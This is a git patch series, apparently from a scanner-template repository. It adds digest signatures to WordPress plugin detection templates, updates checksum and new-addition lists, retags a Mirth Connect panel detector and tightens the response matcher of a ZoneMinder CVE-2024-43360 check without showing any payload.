b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100fe118e2aaf688cd1694a0e9183966be78183d0ac395f3544166b143663def1e3022100de60e7ee945f3eeb9d81f5688c87967de34e832c91a53e06cd2370af97f40c59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..3d94a5caf1 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100dca12b84d67bf1d4532a6997d2e84651faf5c934006527cb0067e6c5b4e24c0f022066b483da585e611a0f4a407920897a4d69e623f115e36e344aad31505609fae3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..5eb1be6fdd 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100e2dee904b25c3a412451e889c0ccd5260b4ec318ecbeeb599f100c7baa6e798f02206b6320cbcfeadda1a47125575e6151974178976cc786512726ae26a560630706:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..d5abe4f2ca 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022019120c9fcb41549aa75defc5da23d8682871ed0ec937601f2722313cd0271579022100bf96b1028ca7da849f8e60207b1e196278fdbe471a8cac4c0ac0e6df1ba2e5d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..2fa645e8a9 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502202f427a2f3fa83ca7729e42241e9ae7b5489536b9f59acb934f1b39aee4e8eb360221009960d2f808e76d58efda81740d48b9fc0d0b4e4afc5b52cfe70ffe4f746e82ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..b22aec906f 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100fc18c4003059386ab94946692b202392ce60edf0642c444b767e985e91ccc086022100e99c6873da50416eb46811027a8045ff7df0c3a5db3642aa274e44f624843b94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..c7f1395cde 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022003af21c7a52570a50f00f15a7dde081616246e908aa98895061e5fe9a5a799b802204eceee0ba05b7ccc8ab78fb3d953d432b571ac08d5a9873faf304361d3f161a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..79058c50f2 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100965c827948222ba9d1db8051f485622cfcdb8ff94f622d8c083bfc7bd859b710022073507598dd8d447d83ddb58d4b220dd54d36ee2e463bef299341e1a9b86d34a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..39cf0e1629 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100d9dddc7b642dd49f50206e634785d3072a0856be4337fa50201a1a49609718fc022021321e62370a9ff64148c804a5b1b013c6d6b5d19609fcdc5f7b2b51b69e4772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..5181bef5cd 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100fe0cdbd3b33666227b7fb6b9f29bb869ceca49d0de976364f2f5008585d66b51022077b4bd6c79d53cb929a58e073e4a162b03f1dadd237b83c82b18e689860a5cda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..4db4b8f778 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022018b58cb3ee39d9281b33761442322be0505762bfc2b03f3819ba348457ad170e0220272b029dcf3a2dfe7a8a058e1041f4ff7552dfe68f38a6aa85482dfa3ab05a83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..e0afa816b9 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204e9baf848426ae46b436cfeae9b828fc5d3bb53639f2fe134decea1941cd620d022100c37a157aa679b5107ecbc75e0244a8e56cb38a110778ebf1ab16465245a71777:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..f36b4efcb3 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502207640d856db1a5521a537459fe4a95134048ff5a1d82a1cc782ca3809759a600b022100fbbd1a6e997898dc794a63a020f9f3d94a2548efdc96f39806dec69bf650fa61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..5d1dfbd7d4 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a0048304602210082d3ce9eb64f5c07f912fcf894cb8d9bb636fd214f507b4986c320239b124018022100bc6d6e9cb42a279eeb688d8e17455538a4a29fbf0714a8094760ba0cd1042055:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..9399808ecf 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502201743e468714148c59765aa4b65436dc514ce387c2d8050362a06e38b5a808294022100d7df317db86df8ae43da68d24e52741b80808c3b8c8b14bf1f074c01c7738bde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..2c7e31d497 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100acfc36e50dd0950c517e3df46b5cf6a2ebab302b419f76f5e1519cdb12e6e7cc02206d7decc4ded9be1c48750f169f1faa44ef9ca16483a9394e56e502f3f5cead04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..164b78812d 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022071e288db5dbfee6cf302b2ae133be0e18e609f3172a207231228e73e4e72de1a0221008392fd9252d305a977ec9c2e6c89c2448333ee299a8444be81698777954f78ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..de4718027a 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221008fd036fb26a175598f129d04282e4d7d94111ed0dbc17587d2c70dfbb6bcdffb022076106d656eb3542ef9ff6b7a795b459788232e7305255543407be9788ed26a51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 7dce46a232c1ce0157bd513424dd430273323e93 Mon Sep 17 00:00:00 2001 From: ghost Date: Tue, 15 Oct 2024 07:18:31 +0000 Subject: [PATCH 076/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6f7db3503c..c098bf360c 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,3 @@ http/exposed-panels/traccar-panel.yaml +http/exposed-panels/txadmin-panel.yaml http/technologies/wordpress/plugins/burst-statistics.yaml From 74a94905c7c255eeb7ab2a05c5d93ab75fc100a7 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 15 Oct 2024 11:19:42 +0400 Subject: [PATCH 077/218] Update mirth-connect-detect.yaml --- http/technologies/mirth-connect-detect.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/http/technologies/mirth-connect-detect.yaml b/http/technologies/mirth-connect-detect.yaml index e0e338e090..2b2929499d 100644 --- a/http/technologies/mirth-connect-detect.yaml +++ b/http/technologies/mirth-connect-detect.yaml @@ -1,18 +1,17 @@ id: mirth-connect-detect info: - name: Mirth Connect Administrator Detection + name: Mirth Connect Admin Panel - Detect author: rxerium severity: info description: | - Detects Mirth Connect Administrator + Detects Mirth Connect Administrator panel. metadata: verified: true max-request: 1 product: mirth_connect shodan-query: title:"mirth connect administrator" - tags: mirth-connect,tech - + tags: mirth-connect,tech,detect http: - method: GET From 726cb6960799bb9c2dd99cf24648f066317bcde9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 15 Oct 2024 11:25:59 +0400 Subject: [PATCH 078/218] additional matcher --- http/cves/2024/CVE-2024-43360.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-43360.yaml b/http/cves/2024/CVE-2024-43360.yaml index f028b58c5b..2ddfc648cf 100644 --- a/http/cves/2024/CVE-2024-43360.yaml +++ b/http/cves/2024/CVE-2024-43360.yaml @@ -8,8 +8,8 @@ info: ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder is affected by a time-based SQL Injection vulnerability. This vulnerability is fixed in 1.36.34 and 1.37.61. reference: - https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-9cmr-7437-v9fj - - https://cvefeed.io/vuln/detail/CVE-2024-43360 - https://medium.com/techpioneers/cve-2024-43360-in-depth-analysis-and-implications-for-security-75ceccc746b4 + - https://nvd.nist.gov/vuln/detail/CVE-2024-43360 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -37,7 +37,7 @@ http: - type: dsl dsl: - 'duration>=6' - - 'contains(body,"result\":\"Ok")' + - 'contains_all(body,"result\":\"Ok", "rows\":[")' - 'contains(content_type,"application/json")' - 'status_code == 200' condition: and From 9679fb7438c8138e9575b5167489940a112ac60e Mon Sep 17 00:00:00 2001 From: ghost Date: Tue, 15 Oct 2024 07:26:25 +0000 Subject: [PATCH 079/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c098bf360c..6b9bc90edc 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ http/exposed-panels/traccar-panel.yaml http/exposed-panels/txadmin-panel.yaml +http/technologies/mirth-connect-detect.yaml http/technologies/wordpress/plugins/burst-statistics.yaml From 38f561fa60506d1c7de36f76c614f6157919c750 Mon Sep 17 00:00:00 2001 From: ghost Date: Tue, 15 Oct 2024 07:26:32 +0000 Subject: [PATCH 080/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 403 +++++++++++++++++++++-------------------- 1 file changed, 202 insertions(+), 201 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c6ad242497..373b16c533 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5137,7 +5137,7 @@ http/exposed-panels/toshiba/topaccess-panel.yaml:f18dd04653999ce3f0744d4e9540a8e http/exposed-panels/total-web-solutions-panel.yaml:c792bfbfed0cfe6971fecf0aa42d4fb417b3d49a http/exposed-panels/totemomail-panel.yaml:a1f46a2540203c5c3093a82282bb98164bb1bf8b http/exposed-panels/tplink/tplink-r470t-panel.yaml:80f1bd596c3ae984132e2848c486a0ba4050dc4e -http/exposed-panels/traccar-panel.yaml:486434503967d7cf27366a20873eb20385a8c600 +http/exposed-panels/traccar-panel.yaml:75c24c75cc871220e2485edac6dc0ece7ab25f8d http/exposed-panels/tracer-sc-login.yaml:57902ac871a95304f034d0aa4a2cb96f04cad2a6 http/exposed-panels/traefik-dashboard.yaml:19db275a7effc62cc9fee16ae6e6b4ac81b98635 http/exposed-panels/trellix-panel.yaml:11b8a41da81bf4dc46c5a373e8c909b36130c29c @@ -7659,6 +7659,7 @@ http/technologies/microsoft-iis-8.yaml:10922e0c2d0a3fad8ff3ddbe9b55655de2e41fa1 http/technologies/microstrategy-detect.yaml:02eafd1137a771e38088c944bd4f1566fdd0cf48 http/technologies/microweber-detect.yaml:3ad6ea0402fc4fa813dea5d14501118f8a98de9c http/technologies/mikrotik-httpproxy.yaml:ea8a65313ce3bdb69e99487bea2d22ab7dcf9701 +http/technologies/mirth-connect-detect.yaml:8c22dc83798d6789029f8e1a69c6a0b8a764129c http/technologies/moinmoin-detect.yaml:04db6100af908c8250ad5b8345437d55c1e1acc4 http/technologies/mojoportal-detect.yaml:db1e2829787dfe997e7e06790e3331d34105ab1c http/technologies/mongoose-server.yaml:79951e8efb17a5bf1f90dd8ef31964878e627f7d @@ -7815,236 +7816,236 @@ http/technologies/windows-communication-foundation-detect.yaml:b52558d968a07f23d http/technologies/wing-ftp-service-detect.yaml:92a8c8080c423ecdbe008bff39e4363d22ce995f http/technologies/wms-server-detect.yaml:5b24766a9022a18cc343b60f0381f69ce70a0b4d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:e76ec92d831996358e1ac04d40563c21277b6cfe +http/technologies/wordpress/plugins/add-to-any.yaml:5b820c3c653cd6014bb9f75c27f2cc6317693a38 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:27f698e4feac1ab8d9fe8aee3a6f545c55fb2bff http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:3d9f47877f12c2c3e1e8243e41043bb3c568ba7a -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:ab718cdd87ce04cf06aac211843853cb7f0e52f6 +http/technologies/wordpress/plugins/akismet.yaml:ce5f2f489bf022c74a1d8cfa4daa0fb29b6f534c http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:05f82841c74ec9c03499293dfc82e41aaf43a1f9 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:bc2d9f0cdc72fbffbe32fe0b0f81e139618f7bfa +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:779d1709c3532cf89f32b781fe3c5d44661d1e49 +http/technologies/wordpress/plugins/amp.yaml:aed72bd8c54c0f471083ec1e53f4cf0c22016bcb +http/technologies/wordpress/plugins/antispam-bee.yaml:9e58871234f7082d34f57597b0840d7fbd6637ba +http/technologies/wordpress/plugins/astra-sites.yaml:49e2f842e2fce0720e25313c3a4dfde349961995 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:4a4148493de40c756d2829cbfbd4bed442a270bf +http/technologies/wordpress/plugins/autoptimize.yaml:1bdf21058db119f5536faa54bf950d4b8e4a93ad +http/technologies/wordpress/plugins/backwpup.yaml:0bbd394a49bfd37d59e56cdbd7036eef9b2e77df +http/technologies/wordpress/plugins/better-search-replace.yaml:f708fb674857791ff7f9a71207b787a97435f2a2 +http/technologies/wordpress/plugins/better-wp-security.yaml:7ab2660aafe3c96a3e2203faf7577dab96048e9f +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:85254a1fa6d6a47554bd99284dea781423cc0d97 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:2a099c86f5982992b640fac69ae846c8f853b05f +http/technologies/wordpress/plugins/breeze.yaml:03a8f2470ecabb02bb98f559fc75b265269636b6 +http/technologies/wordpress/plugins/broken-link-checker.yaml:7e509fda14b127e62057f4d478c4c39c3b22043c http/technologies/wordpress/plugins/burst-statistics.yaml:8ae381b1138e0ed2a3121f84c7e14d33a6d6ed8a -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/chaty.yaml:abb750cb6a5b4d9a43543961e0cdd569df5b2793 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:914cd0bbcbdf8040030a4b2ec5a16d6b69287a81 +http/technologies/wordpress/plugins/classic-editor.yaml:82a854031a4b4caba58e2e7a91bdd02d2b227dc0 +http/technologies/wordpress/plugins/classic-widgets.yaml:89a291ae777903ffaa6676a5dcbe03ff8b0b0f34 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:ee962ef9d1260e01ddcb46c9b097832accb02ad5 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:02b01785c66dee2c06b91fd257f5ea08b8d557c6 -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:85ed4754232635fa21a85b407d4cff31d35387c9 -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:15b29b223059b4561191daad48e2b297522dc57c +http/technologies/wordpress/plugins/coblocks.yaml:68400dd773f8b381f07b7b1c5480ff2e826865e0 +http/technologies/wordpress/plugins/code-snippets.yaml:df1ba9f3070210c8bcbf6bec0f94eb4c82c4263f +http/technologies/wordpress/plugins/coming-soon.yaml:3fb66b28dd221616e43edd3a95057b6e1a28418d +http/technologies/wordpress/plugins/complianz-gdpr.yaml:ec73ce30e3c26612891b7ad9fc0610d277f26960 +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:1753087cfea09b2566ae641c82e4abc8ba264d4d +http/technologies/wordpress/plugins/contact-form-7.yaml:21bf3bb2e2fe772b1da4d0a8da5df1ba966684ef +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:88fbbfdc8849c9775f110ef66207d7bf9b02be02 +http/technologies/wordpress/plugins/cookie-law-info.yaml:9a5a8374d9330c7f04b0610b920577dc810eab14 +http/technologies/wordpress/plugins/cookie-notice.yaml:a41402d650ee1495554fd712c47c502ccad99e3c +http/technologies/wordpress/plugins/copy-delete-posts.yaml:43d5cdc3ba793cbcd97ebb18580b718b05d6423a +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:bab561f34984b1ff4d49342fec4aeec73b7ba66d +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:1f87b2219f68e7923396522c6e0ffa0c9193261a +http/technologies/wordpress/plugins/custom-css-js.yaml:9e6a62b8d08108801913c0d16e2540aec1c11ca1 +http/technologies/wordpress/plugins/custom-fonts.yaml:4a6a7bee1e9a01765c1a1829263787774037a9e0 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:73032e4a9c508556692d1637d6e686bd96a75346 +http/technologies/wordpress/plugins/disable-comments.yaml:de92023543c05827fad0307dd75ce1bd1eba8065 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:3f185e1f9f6be61180ff761e7ab70986b0042fe7 +http/technologies/wordpress/plugins/duplicate-page.yaml:60baf4ae2ab7d9caeb1dce203537307563c99f38 +http/technologies/wordpress/plugins/duplicate-post.yaml:d417c0b8f74fb6f06d3d82d4574ddb7429a7611e +http/technologies/wordpress/plugins/duplicator.yaml:2b6092cb2a2b21f698eca7e7482657f11da3bb9e +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:44e6d4baa779fff9a7374b5c04920403c88815b4 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:78b3c78912cbdc4c8349bef72fd8fd6fa24beb21 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:022f518e7d49f749cbf45a0e81c4bcdc60f7e758 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/extendify.yaml:16df61d6c1c08c47ee240cf33df07fd008bc0a27 